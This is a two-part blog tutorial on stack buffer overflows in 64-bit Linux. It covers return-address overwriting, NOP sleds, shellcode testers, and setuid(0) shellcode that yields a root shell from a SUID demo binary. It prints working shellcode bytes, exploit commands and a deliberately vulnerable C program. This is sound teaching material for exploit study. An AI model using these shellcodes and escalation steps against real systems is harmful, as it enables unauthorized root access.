Sunday, July 28, 2024

Buffer overflow: Tips, Tricks & Traps [part II]

 

0x1.0x2 ShellCodes

In hacking, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode. Shellcode is commonly written in machine code. (Wikipedia)

Shellcode is a sequence of raw machine-code bytes; in this article I loosely call it "bytecode".
Strictly speaking, a shellcode is machine code that spawns a command shell: an "environment" in which I can execute system commands.

To create a working shellcode you have (mainly) two choices:
  1. Write an assembly program, assemble and link it, and extract the generated machine code, or
  2. Do the same with a C or C++ program.
Let's follow the more low-level method: creating a shellcode from an assembly program.
There are many shellcodes available in many places on the internet. A well-known one is https://www.exploit-db.com/


Below is an assembly program whose machine code spawns a shell (/bin/sh):
;
;
; Source: https://www.exploit-db.com/exploits/47008
;
; Compile: nasm -felf64 spawn_shell.nasm -o spawn_shell.o
; Link: ld spawn_shell.o -o spawn_shell
;-----------------------------------------------------------
;
global _start

section .text

_start:

    ;int execve(const char *filename, char *const argv[],char *const envp[])
    xor     rsi,    rsi            ;rsi = 0 (argv = NULL)
    push    rsi                ;push 8 zero bytes: the string terminator
    mov     rdi,    0x68732f2f6e69622f     ;"/bin//sh" as a little-endian constant
    push    rdi
    push    rsp    
    pop    rdi                ;rdi = pointer to "/bin//sh" on the stack
    mov     al,    59            ;sys_execve (assumes the upper bytes of rax are already zero)
    cdq                    ;sign-extend eax into edx:eax, so rdx = 0 (envp = NULL)
    syscall
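
To see why the constant is described as "/bin//sh in reverse order", here is a small Python sketch. The helper name immediate_to_bytes is my own and not part of the original shellcode. It packs the 64-bit immediate the way x86-64 stores it in memory, least significant byte first:

```python
import struct

def immediate_to_bytes(value):
    """Return the 8 bytes that a 64-bit little-endian store of value leaves in memory."""
    return struct.pack("<Q", value)

# The immediate loaded into rdi by the listing above.
path = immediate_to_bytes(0x68732F2F6E69622F)
print(path)
```

The doubled slash pads the path to exactly 8 bytes, so the immediate itself contains no 00 byte; the terminator comes from the zero that was pushed just before it.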

I created a very simple script to assemble and link the program and to display the corresponding machine code:
Bash:
#!/bin/bash
# $1 is the base name of the source file (without the .asm extension)
printf '\033[33;1mCompiling...\033[0m\n'
nasm -f elf64 -o "$1.o" "$1.asm"
ld -o "$1" "$1.o"
echo 'ok'
echo
printf '\033[33;1mAssembly code:\033[0m\n'
objdump -M intel -d "$1"
echo
Then, I run it as follows:

The machine code above is shown as a series of hexadecimal numbers. Each pair of hex digits is one byte, and each byte is in turn eight bits (0s and 1s). This is why we call it machine code.
The only task left now is to take these bytes and put them in a string, as below:
"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05"
Note the hexadecimal format here. Does it remind you of something from Part I (paragraph "0x1.0x1. The ROP approach")?
The main idea is this: we want to put these bytes in memory and execute them as a program.

NOTES:
  • Shellcodes are architecture specific: there are different shellcodes for 64bit and for 32bit systems.
  • A shellcode written for a 32bit system will not run as-is inside a 64bit process (and vice versa).
  • To run code located on the stack, the stack must be marked executable, because by default it is not. This can be done (for example) by passing the -z execstack flag to gcc, which forwards it to the linker.
  • A shellcode that runs on one system (for example a CentOS x64 box) is not 100% guaranteed to run on another system with the same architecture (for example an Ubuntu x64 box).
Another question that many people ask is: how do I test my shellcode?

Well, I have two methods for testing shellcodes and I will provide both in this article.

0x1.0x2.0x1 Testing a shellcode - method I

This code provides a C template into which you paste a shellcode, so that you can run it live from a char buffer inside an ELF x64 binary. You create a global buffer with the shellcode; the program marks it as RWX using mprotect() and then finally jumps into it.
C:
/**********************************************************************
*
* Program: tester64.xss.org.c
*
* Initial Date: 08/06/2021
* Mod by Geometry: changed to work on 64bit (10/04/2023)
*
* Initial Author: Travis Phillips
*
* Purpose: This code is used to provide a C template to paste shellcode
*          into and be able to run it live from within an ELF x64 binary's
*          char buffer. This allows you to create a buffer with the
*          shellcode globally and this program will mark it as RWX using
*          mprotect() and then finally jump into.
*
* Compile: gcc -m64 tester64.xss.org.c -o tester64.xss.org
*
***********************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <string.h>

/////////////////////////////////////////////////////
//  source file: execve(/bin/sh)
/////////////////////////////////////////////////////
char payload[]="\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05";


int main() {

   // Print the banner.
    puts("\n\033[33;1m---===[ Shellcode Tester x64 Stub v1.1 ]===---\033[0m\n");
 
    // Print the size of the shellcode.
    printf(" [\033[34;1m*\033[0m] Shellcode Size:  %zu\n", sizeof(payload)-1);

    // Create a function pointer to the shellcode and
    // display it to the user.
    void (*payload_ptr)() =  (void(*)())&payload;
    printf(" [\033[34;1m*\033[0m] Shellcode Address: %p\n", (void *)payload_ptr);

    // Calculate the address to the start of the page for
    // the shellcode.
    void *page_offset = (void *)((long)payload_ptr & ~(getpagesize()-1));
    printf(" [\033[34;1m*\033[0m] Shellcode page: %p\n", page_offset);

    // Use mprotect to mark that page as RWX; stop if the call fails.
    if (mprotect(page_offset, getpagesize(), PROT_READ|PROT_WRITE|PROT_EXEC) != 0) {
        perror("mprotect");
        return 1;
    }

    // Finally, use our function pointer to jump into our payload.
    puts("\n\033[33;1m---------[ Begin Shellcode Execution ]---------\033[0m");
    payload_ptr();

    // We likely won't get here, but might as well include it just in case.
    puts("\033[33;1m---------[  End Shellcode Execution  ]---------\033[0m");
    return 0;
}

As you can see in the comments, we do not need -z execstack at compile time, because the program itself marks the memory as RWX (Read Write Execute) using mprotect().
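
mprotect() works on whole pages, which is why the tester first rounds the payload address down to a page boundary. The arithmetic can be sketched in Python as follows; the example address is hypothetical, and the 4096-byte page size is an assumption that matches typical x86-64 Linux systems:

```python
def page_start(address, page_size=4096):
    """Round address down to the start of its page (page_size must be a power of two)."""
    return address & ~(page_size - 1)

example = 0x555555558060  # hypothetical address of the payload buffer
print(hex(example), "->", hex(page_start(example)))
```

Clearing the low 12 bits is the same operation as the `& ~(getpagesize()-1)` expression in the C program.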
Executing and testing it is straightforward:

Notes:
  • You cannot use the above as-is to test 32bit shellcodes.
  • BUT, it is SUPER easy to change the program for 32bit shellcode testing: compile with -m32 instead of -m64 and change the line that computes page_offset from:
    void *page_offset = (void *)((long)payload_ptr & ~(getpagesize()-1));
    to:
    void *page_offset = (void *)((int)payload_ptr & ~(getpagesize()-1));
  • The shellcode must not contain the byte 00: string functions such as strcpy treat it as a terminator, so everything after it would never be copied into the target buffer. This restriction causes some of the biggest headaches when creating shellcodes. There are several methods to avoid the 00 byte (such as XORing), but they are beyond the scope of this article.
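
A quick way to check the 00-byte rule before testing is to scan the shellcode for null bytes. This is a minimal sketch; the function name find_null_bytes is my own, and the hex string is the 22-byte payload used throughout this article:

```python
def find_null_bytes(shellcode):
    """Return the offsets of every 0x00 byte in shellcode."""
    return [offset for offset, byte in enumerate(shellcode) if byte == 0]

payload = bytes.fromhex("4831f65648bf2f62696e2f2f736857545fb03b990f05")
print("size:", len(payload), "null bytes at:", find_null_bytes(payload))
```

An empty list means the payload can pass through strcpy without being cut short.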

0x1.0x2.0x2 Testing a shellcode - method II

This is a very common method that almost all (normal??) people use to test shellcodes.
It is far simpler, but it requires setting some compiler flags (which we already explained in Part I of this series).
This is the code:
C:
//  tester2-xss.is.c
//  source file: https://www.exploit-db.com/exploits/47008
//  Linux/x86_64 - execve(/bin/sh)
//  payload size: 22 bytes
//
// compile with:   gcc -w -m64 -g -fno-stack-protector -z execstack -o tester2-xss.is tester2-xss.is.c
//////////////////////////////////////////////////

int main(void) {
   char shellcode[] = "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05";
   (*(void (*)()) shellcode)();
   return 0;
}
Simpler, and almost one line of code, huh?
This is the wild beauty of C...  

Again, the testing is straightforward:

So far, so good.
Let's see now what we can do with these shellcodes...


0x1.0x3 ShellCodes on buffer overflow

Consider the demo C program we used in Part I of this series, with one very slight change: the size of the variable key in function checkProductKey (line 5 of the Part I listing) grows from 12 bytes to 64 bytes.
For clarity, here is the whole source code again:
C:
// demo.c
// (c) Geometry for xss.is 2023
//
// Compile: gcc -m64 -g -fno-stack-protector -z execstack -o demo demo.c
//
#include <stdio.h>
#include <string.h>

int checkProductKey(char *userKey) {
    char key[64];
    strcpy(key, userKey);
    int n = (strcmp(userKey, "123-456") == 0);
    return n;
}

int main(int argc, char* argv[]) {
    char key[255];
    if (argc != 2) {
        printf("Enter product key >");
        scanf("%s",key);
    }
    else
        strcpy(key, argv[1]);


    int iAllow = checkProductKey(key);

    if (!iAllow) {
        printf("Wrong key!\n");
        return -1;
    }

    printf("Welcome to the DEMO SA Application.\n");
    printf("(c) 2023 all rights reserved.\n");
    return 0;
}

By using the method described in Part I we can easily find the RET address and build the exploit that redirects the program past the product-key checks:

As you notice, the variable key of function checkProductKey is 64 bytes long.

Our goal is to replace some of the "A"s with the shellcode bytes and redirect the program into the buffer itself in order to execute the shellcode.

To do this more easily we are going to change the way we supply the command line argument.
We are going to use a hex editor for this.
Kali has two very nice hex editors: HexEdit and HexEditor.
But of course you can choose whatever you like to work with.

I will put the argument (that I will pass to my program) into a file and edit it with a hex editor.
Step 1: put the argument into a file:
python -c 'print("A"*88+"\x55\x55\x55\x55\x52\x61"[::-1])' > args

Now the args file contains the argument, and I can edit it in a hex editor by entering this command:
hexeditor -b args
Note that the -b flag allows me to make changes (deletions, insertions) in the file.

Well... this is not exactly what I would like to see. The last byte, "0A", is the line feed character that Python's print appends to its output.
I don't need it here, so I will remove it!
This is the correct file:
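
The stray 0A byte can also be avoided at the source. The following sketch (the helper printed_text is my own, used only to capture the output) shows that print appends a line feed by default and that passing end="" suppresses it:

```python
import io

def printed_text(text, end="\n"):
    """Capture exactly what print() would write for text."""
    buffer = io.StringIO()
    print(text, end=end, file=buffer)
    return buffer.getvalue()

print(repr(printed_text("AAAA")))          # default: a line feed is appended
print(repr(printed_text("AAAA", end="")))  # end="" suppresses the line feed
```

Note that the shell's $(...) substitution strips trailing line feeds anyway, so the extra byte matters mostly when you inspect or edit the file itself.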

 
Now I can test if my exploit still works by passing the args file as command line parameter:
./demo $(cat args)



It works fine!

Now, let's go to the debugger to explain some more things:


 
We put a breakpoint on line 7 - [b 7] (as in Part I) and we run the program with the command: 
r $(cat args)

What I see in RED is where I currently am: the RET address has been overwritten with 0x555555555261, and this is what performs the redirection.
What I see in YELLOW is where "I want to go": I want to put my shellcode somewhere among the "A"s and then change the RET address to point to one of these addresses (in the yellow box).

To maximize the chance of a successful attack I will use an additional trick: I will replace the "A"s with NOP instructions.
A NOP (hexadecimal 0x90) is an instruction that tells the processor to do... nothing, or better, to move on to the next instruction!
Thus, if the RET address does not point exactly to the start of the shellcode but a few bytes before it, execution slides over the 90s and my shellcode will finally (and hopefully) be executed.

Let's first see if my exploit still works when I replace the "A"s with "90"s:

 Well... Success!
Now let's try to put my shellcode (the one I created in the previous paragraph) in here.
If I delete the "\x" from my shellcode "\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05" I get this:
4831f65648bf2f62696e2f2f736857545fb03b990f05
Now I have to place the above at a good position inside my args file and then change the RET address to point to an address before the shellcode but inside the run of "90"s (see the yellow box in the second image above).
 


 And finally, YES: as you can see, I got a shell by placing my shellcode at the beginning of the args file and changing the RET address to one of the candidate addresses I found in the debugger.
Note that the STACK addresses I get from the debugger are not guaranteed to be exactly the same as those I get when I run the program from the command line. In such cases I have to adjust the RET address a bit until I get a working shell.


0x1.0x4 Got root?

So far we have a shell with user privileges. But this is not our final goal, as our main purpose (usually) is to get root... or, rather, a shell with root privileges.
The question now is: is this possible?

Well, the answer is YES, but under certain conditions.
One such condition is when we run a SUID program.
SUID: stands for Set owner User ID. This is a special permission that applies to scripts or applications. If the SUID bit is set, when the command is run, it's effective UID becomes that of the owner of the file, instead of the user running it. (techrepublic.com)
There are cases where the root user gives SUID permission to an application because it requires specific privileges. This way a lower-privileged user can run the SUID program without holding those privileges themselves.
The vulnerability arises when such a SUID program has a buffer overflow and so allows the caller to execute commands with the SUID privileges...
So, can you imagine what would happen if our small demo program had SUID privileges?

Let's see this in reality.
First of all we make our demo executable SUID as follows:
Code:
sudo -s
chown root demo
chgrp root  demo
chmod 4777 demo


That is: open a root console, change the owner and group of the program to root, and then change its mode to 4777.
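
The leading 4 in mode 4777 is the set-user-ID bit. As a small illustration (the helper has_suid is my own name), Python's stat module can decode such a mode value:

```python
import stat

def has_suid(mode):
    """True when the set-user-ID bit is set in a file mode."""
    return bool(mode & stat.S_ISUID)

mode = stat.S_IFREG | 0o4777   # a regular file after chmod 4777
print(stat.filemode(mode), has_suid(mode))
```

For a real file you would pass os.stat(path).st_mode instead of the constant used here; the "s" in the owner's execute position is what ls shows for a SUID binary.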

Now our demo program looks like this:



According to the SUID logic we explained above, if we execute our shellcode inside the demo process it should return a root shell.
Well, let's try it:

 
Oops!!!
Oh no!!! It does not work... I still get a shell, but with user privileges!!
But why??
Well... there is a reason for this:
Many popular Linux implementations of sh drop privileges when they start up:
they reset their effective UID to their real UID. This includes 'bash', 'dash', 'mksh' and 'BusyBox' sh, so on Linux you are unlikely to see anything else.
OK, is there anything we can do about it?
And of course the answer (as usual) is: YES!

We can create a shellcode from an assembly program that sets the UID to 0 (aka root) and then calls the shell. To be more technically specific, see below:
setuid(0); execve(/bin/sh);

Well, it is not necessary to create it from scratch, since it already exists here: https://shell-storm.org/shellcode/files/shellcode-77.html
The shellcode is this:
"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05"

To be sure that it works on our box, I tested it with the tester I presented in paragraph 0x1.0x2 "ShellCodes" and verified that it indeed returns a shell. Note that you must test every shellcode before you use it, in order to check that it works on your box. Also note that there are cases where a shellcode returns a shell when run from the tester program but does not work when placed on the stack. You know, as we said in Part I, sometimes the results are non-deterministic.

Anyway, let's try this new shellcode with our demo program.
The first question is: does it fit in the buffer?
Well, the above shellcode is 48 bytes and our buffer (the key variable) is 64 bytes, so the answer is YES.
OK... let's do it!
Modify the args file and run it...

OOooo YES!
Got Root...

What is Next?

How about a Part III with an example on Windows 11 64bit?
Are you still interested?
...



Happy Reversing








 





Saturday, July 27, 2024

Buffer overflow: Tips, Tricks & Traps [part I]

 

0x0. Introduction

A buffer overflow (bof), or buffer overrun, is an anomaly whereby a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations (Wikipedia).

Well, let's talk about this very old software vulnerability and see if it still matters.

Since the very first article by Aleph One (Elias Levy) in 1996, "Smashing The Stack For Fun And Profit", 27 years have passed. The answer to the question "Is this vulnerability still active?" is a big YES!
Indeed, nowadays, with modern software development environments and languages (.Net, J2EE, RoR, etc.), it is not so easy to perform such an attack. But... the more generic applications that were created in languages vulnerable to buffer overflows (such as C or C++) still exist, and they are many: web servers, operating systems, RDBMSs and, generally, almost everything we run our "safe" applications on...

In this series of articles I will try to explain to newcomers how such attack can be performed in modern environments and Operating Systems.

Since these attacks depend on memory architecture, OS architecture and specific compiler implementations, there are several assumptions we must make.
We will discuss these assumptions for every architecture we choose.

NOTE: The examples that you will see here make heavy use of memory addresses. It is very unlikely that you will see the same memory addresses on your system if you try my examples on your own. This is not a bug, but a feature!

Let's start with Linux... 

0x1. Linux 64bit on 64bit application

Let's create our demo application in C language to complete the test.
The source code is this: 

#include <stdio.h>
#include <string.h>

int checkProductKey(char *userKey) {
    char key[12];
    strcpy(key, userKey);
    int n = (strcmp(userKey, "123-456") == 0);
    return n;
}

int main(int argc, char* argv[]) {
    char key[255];
    if (argc != 2) {
        printf("Enter product key >");
        scanf("%s",key);
    }
    else
        strcpy(key, argv[1]);


    int iAllow = checkProductKey(key);

    if (!iAllow) {
        printf("Wrong key!\n");
        return -1;
    }

    printf("Welcome to the DEMO SA Application.\n");
    printf("(c) 2023 all rights reserved.\n");
    return 0;
}

This very simple demo program takes a product key as input. If the product key is correct it continues to the main flow; otherwise it prints an error and exits.
The input can be given as a command line argument or, if no argument is provided, the program asks the user to enter it.

In order to be able to make a successful attack, we make some assumptions by using specific compiler flags.
I compile the program as follows:

gcc -m64 -g -fno-stack-protector -z execstack -o demo demo.c

Let's explain the flags:

  • -m64: create a 64bit executable (to be honest, I could omit this on this system, since it is the default).
  • -g: produce debugging metadata (that we will use later in the debugger).
  • -fno-stack-protector: do not insert stack protection checks (stack canaries).
  • -z execstack: allow code to execute from the stack segment (in memory).
  • -o demo: name the final executable demo.

The specific example has been implemented in KALI Linux 2022.4



In addition, it is very important to disable the ASLR (Address Space Layout Randomization) protection.
To do this on Kali, just enter this command as root:

echo 0 > /proc/sys/kernel/randomize_va_space


Any time you want to re-enable ASLR, just enter this:

echo 2 > /proc/sys/kernel/randomize_va_space


Btw, if you want to check the current state of ASLR, enter this:

sudo cat /proc/sys/kernel/randomize_va_space
  • 0: means OFF
  • 2: means ON
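
The same check can be scripted. This is a minimal sketch: the function name describe_aslr is my own, and the description of value 1 (partial randomization), which the list above does not mention, follows the Linux kernel documentation for this setting:

```python
from pathlib import Path

ASLR_STATES = {
    "0": "off",
    "1": "partial (stack, mmap base and VDSO randomized)",
    "2": "full (heap randomized as well)",
}

def describe_aslr(raw_value):
    """Translate the content of randomize_va_space into a readable state."""
    return ASLR_STATES.get(raw_value.strip(), "unknown")

proc_file = Path("/proc/sys/kernel/randomize_va_space")
if proc_file.exists():  # only present on Linux
    print("ASLR is", describe_aslr(proc_file.read_text()))
```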


In the following image we can see a normal execution of my small demo program.


As you can see, there are (at least!!) two main vulnerabilities in the program: the two places where the unsafe strcpy function is used. Let's see this in practice:



As you can see, this is the way to test whether our program is vulnerable to a buffer overflow attack: we give it a very large string and then we check the program's response. If we get a 'segmentation fault', then the program may have a bof (buffer overflow) vulnerability...

0x1.0x1. The ROP approach

According to Wikipedia: Return-oriented programming (ROP) is a computer security exploit technique that allows an attacker to execute code in the presence of security defenses such as executable space protection and code signing .
Our main goal here is to take advantage of a program's vulnerability in order to redirect the program's flow to where we like (and where we can, of course)...

Let's examine the program's behavior using the gdb debugger.


 
 We put a breakpoint at line 7, immediately after the strcpy, inside the function checkProductKey.


We run the application inside the debugger (just enter gdb ./demo), passing a normal string, in order to check where the RET address is located (more about this below)...


Let's discuss some "things" here...
The image above is divided into 2 consoles:
  • The left console shows the program's disassembly, which I get after setting the breakpoint at line 7 (break 7) and entering disassemble /s main. The "/s" parameter instructs the debugger to print the assembly code along with the corresponding C source code (thanks to the -g flag in the compilation phase).
  • The right console is the actual console where we test the program.
  • Note also one very important thing: the memory addresses (shown in blue) are the same in both images. This is a very tricky point in real situations, because these addresses may not be the same every time we run our program. This is because of ASLR, and this is why we disabled it above; otherwise we may end up hunting... ghosts, believe me!

As you can see in the GREEN BOXES, we run the program in the debugger by passing ten "A"s as the argument: run AAAAAAAAAA
This string ends up on the stack when checkProductKey is called, because strcpy copies it into the local variable key.
We can see the stack in memory by entering the x/24xg $rsp command in the debugger. This command instructs the debugger to show, in hexadecimal format ("x"), the next 24 memory positions as giant ("g") 8-byte words.
$rsp is the well-known Stack Pointer (the old ESP on 32bit systems), which in our case points to the top of the stack frame of our function, where its local variables live.

The "AAAAAAAAAA" are represented here in hexadecimal format ("x") by the number "41", which is the hexadecimal ASCII code of the letter "A".
Also note that the 10 "A"s appear in reverse order inside each 8-byte word of the dump, because of the little endian architecture.
The actual string that is kept on the stack (in memory) is '41.41.41.41.41.41.41.41.41.41.00' (I put the "." just to make it more readable).
Note that the "00" is the Null Character that denotes the string termination. Remember this "00", because it plays an important role (as a barrier) in exploit development in general, and specifically in shellcode (or bytecode) creation (more on this in part II). The main point to know here is this: C string functions such as strcpy stop reading a series of memory locations when they meet a 00 byte.
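
The byte order in the dump is easier to see with distinct letters than with ten identical "A"s. In this sketch (the function name as_gdb_giant_word is my own) the bytes sit in memory in the order they were typed, and the 8-byte word view reads them least significant byte first:

```python
def as_gdb_giant_word(chunk):
    """Format 8 bytes of memory the way an x/xg dump shows them (little endian)."""
    return "0x%016x" % int.from_bytes(chunk, "little")

memory = b"ABCDEFGH"   # bytes in increasing address order
print(as_gdb_giant_word(memory))
```

The "A" (0x41) stored at the lowest address ends up as the rightmost pair of hex digits in the printed word.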

Focus now on the RED BOXES and remember where we stand: we are inside the function checkProductKey.
When the function ends, execution must return to the place it was called from. To be more specific: it must return to the address of the caller.
In order for the system to remember this address, it stores it in a specific memory location inside the stack frame of the current function. We call this address the RET (RETurn) address. It is one of the most important addresses in buffer overflow attacks and is considered the "holy grail" of any buffer overflow exploitation.
As you can see in the red box on the right console, the RET address is stored past the end of the buffer, after our input string "AAAAAAAAAA" and some other values (such as the saved Base Pointer, which are important... but not so important for now).

As you can imagine, if we enter a very big input string, larger than what the program has reserved (in our case 12 bytes, because of the char key[12]; at line 5), then we can overwrite everything that follows this variable, including the RET address. This is very important and very tricky!
And this is why:
Suppose that we entered "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" as input.
Our buffer can hold only the first 12 characters (bytes), including the string terminator "00". So what about the remaining characters? They will overwrite the neighboring memory... including the RET address.
So the RET address will be filled with "A"s, that is "AAAAAAAA" or "4141414141414141".
Note that I chose 8 bytes to denote the address on purpose, since we are on a 64bit system.
In general, you should know that in 64bit systems (as opposed to the 32bit systems) we have:
  • General purpose registers have been expanded to 64-bit. So we now have RAX, RBX, RCX, RDX, RSI, and RDI.
  • Instruction pointer, base pointer, and stack pointer have also been expanded to 64-bit as RIP, RBP, and RSP respectively.
  • Additional registers have been provided: R8 to R15.
  • Pointers are 8-bytes wide.
  • Push/pop on the stack are 8-bytes wide.
  • Maximum canonical address size of 0x00007FFFFFFFFFFF (more on this later).
Consider the RET address in conjunction with another very important value, which is stored in a processor register: the Instruction Pointer, or $RIP. This register always holds the address of the next instruction that the program will execute. When our function ends, the RET address is loaded into $RIP and execution continues from there. Thus, the program returns to the caller, since the RET address holds the caller's address or, to be more specific, the address of the instruction right after the one that called the function.

So, in our theoretical example above, the RET address will be filled with "4141414141414141", which means that the program, at the end of the checkProductKey function, will try to go to the address 0x4141414141414141.
But no such address exists in our program's context, so we get the well-known error: segmentation fault

With the above knowledge in mind, let's try to exploit our program.
By examining the stack at $rsp in our initial example (in the image above) we can see that we need 3 x 8 bytes in order to reach the RET address.
Let's prove this with the following example:

 As you can see, we enter 24 x "A" = "AAAAAAAAAAAAAAAAAAAAAAAA", and then the 8 "B"s "BBBBBBBB" overwrite the RET address.

The program crashed...
What we would actually like is to control $RIP. But, in fact, we don't control $RIP directly at all. We only control the RET address, as you have already seen.
For your info, you must know this:
The maximum user-space address we can use on the 64bit architecture is 0x00007FFFFFFFFFFF. What we did was try to load $RIP (via RET) with the non-canonical address 0x4242424242424242, which causes the processor to raise an exception.
[If you have problems understanding this situation, you can read more about 64bit address architecture here .]
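
Whether an address is canonical can be checked with a few lines of Python. This is a sketch under the assumption of 48-bit virtual addresses (the common 4-level paging setup); the function name is_canonical is my own:

```python
def is_canonical(address):
    """True when bits 47..63 of a 64-bit address are all equal (48-bit addressing)."""
    top_bits = address >> 47           # the 17 most significant bits
    return top_bits == 0 or top_bits == 0x1FFFF

for candidate in (0x00007FFFFFFFFFFF, 0x4242424242424242, 0x0000555555555261):
    print(hex(candidate), is_canonical(candidate))
```

The "B" pattern fails the check, while an address inside the program's own code passes it.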


So the goal is to find the offset at which we overwrite RET, and consequently $RIP, with a canonical address.
For this I use a cyclic pattern (say "AAAAAABBBB" etc.) and try it until I end up with the needed offset (and yes, I know that there are other published methods that calculate the required offset differently, but the one I present here also works for me).

So, I am going to replace "BBBBBBBB" with an existing address in the program's own code (the code segment) in order to bypass the product-key checks.
This address is the following:


This is the point where all the product-key checks have been passed, and this is what I call ROP (see the paragraph title).
I need to replace the "B"s with this address: 0x0000555555555261

But I have to pass its value as bytes... not as a string! How do I do this?
There are several ways to pass this string as "bytes" in the debugger.
I will choose the quickest one... take a look here:


 Let's examine the attack "string" a little:

Here I use a bit of python v.2 (v.3 also works here if I wrap the print argument in "(" and ")", because every byte of this address is below 0x80):
python2 -c 'print "1"*24 + "\x55\x55\x55\x55\x52\x61"[::-1]'

Instead of writing an explanation in text here, I will show an image of the result when I execute it on the command line:

As you can see, I pass the above result as a command line argument in gdb using the run $( <SYSTEM_COMMAND> ) notation.
This is an easy way to pass the command line string as bytes to a program.
The program crashes in the end, but I made a successful redirection, as you can see from the 'Welcome' message (in the green box above). Thus, I bypassed the checking mechanism.

Note also the way I pass the target address, in reverse order: the [::-1] python notation simply reverses the byte string.
Thus, the "55.55.55.55.52.61" will be put in the argument string as "61.52.55.55.55.55" (remember the little endian architecture I mentioned above).
Important note: the "555555555261" is reversed per pair of hex digits, that is per byte, not per digit.
In general, any memory content we read is a series of such pairs, that is a series of bytes (8 bits each, with values from 0 to 255 - aka 2^8=256 possible different values).
"Historically, the byte was the number of bits used to encode a single character of text in a computer and for this reason it is the smallest addressable unit of memory in many computer architectures." (wikipedia)
The same applies to 64-bit Windows 10 and 64-bit Kali Linux on x86-64.
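
The per-byte reversal can be double-checked with Python's struct module. This is a sketch (the helper name ret_bytes is my own) that packs the address as a little-endian 64-bit value and drops the 00 padding at the high end, since 00 bytes cannot be passed inside a command line argument:

```python
import struct

def ret_bytes(address):
    """Little-endian bytes of a 64-bit address, without the trailing 00 padding."""
    return struct.pack("<Q", address).rstrip(b"\x00")

target = 0x0000555555555261
print(ret_bytes(target).hex("."))
```

The result is the same byte sequence that the [::-1] slice produces from the six bytes written in reading order.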

In addition, the '\x' notation indicates that I am writing each byte not in decimal but in hexadecimal.
I do this because the debugger displays memory addresses in hexadecimal notation.
If you wonder why the debugger prefers the hexadecimal notation, I would say this:
The decimal representation of the hexadecimal address 555555555261 is this number: 93824992236129. Well, it looks more like a telephone number, huh? ;)
So... it is not so easy for a human to cope with such long numbers. The hexadecimal notation is more compact and consequently more manageable. This is why it has been adopted by (almost) all debuggers in the world to represent addresses.
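
If you want to verify the conversion yourself, Python does it in one line each way:

```python
address = int("555555555261", 16)   # hexadecimal text to integer
print(address)                      # decimal form
print(hex(address))                 # back to hexadecimal
print(len(str(address)), "decimal digits vs", len("%x" % address), "hex digits")
```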

So far I have performed a "goto" (remember the goto statement in BASIC?) or a JUMP (assembly-wise) by using the debugger.
What I need now is to do the same with the final executable from the command line in a console, NOT by using gdb.

Well, the answer is simple enough: I just run this from the command line:


 
As you can see, I just opened the Welcome screen without entering any product key, and I have just created my first buffer overflow exploit...

Note that the result in the image above is not always so clear-cut, especially when we mess with memory addresses and the stack directly. Often what I see in the debugger is not exactly the same as what I see when I execute the program directly from the command line, and this is very common when I have to refer to addresses on the stack (and not in the code segment, as I did here).
We will see such an example in Part II of this series, where I show how to put a "command shell" on the stack and how to execute it. In addition, in Part II we will see what a bytecode is, how to create or find ready-made bytecodes and how to test them. We will see in such cases that the results may not be as deterministic as we would expect...

Happy reversing